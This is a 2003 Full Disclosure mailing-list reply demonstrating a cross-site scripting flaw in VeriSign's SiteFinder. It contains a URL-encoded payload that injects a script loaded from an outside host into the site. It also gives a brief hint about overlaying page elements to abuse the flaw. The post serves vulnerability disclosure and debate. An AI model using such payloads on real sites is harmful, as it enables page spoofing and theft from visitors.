Full Disclosure mailing list archives

RE: Global *.net XSS, thank you Verisign(TM)


From: tadpole-boy <spam () def-con org>
Date: Tue, 16 Sep 2003 11:39:34 -0500 (CDT)

http://sitefinder.verisign.com/lpc?url=%27%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%77%77%2e%64%65%66%2d%63%6f%6e%2e%6f%72%67%2f%76%65%72%69%73%69%67%6e%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e%3c%61%20%27

go ahead and extend the div's to span the window, set the z-index, create
little mojo and this is a site someone can abuse.

anyways, I'm sure you get the idea


On Tue, 16 Sep 2003, Richard M. Smith wrote:

VeriSign should fix their bug, but I don't see the danger of a
cross-site scripting error at a non-existent domain.  The scripting code
can't really do anything at the Web site........

Richard

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: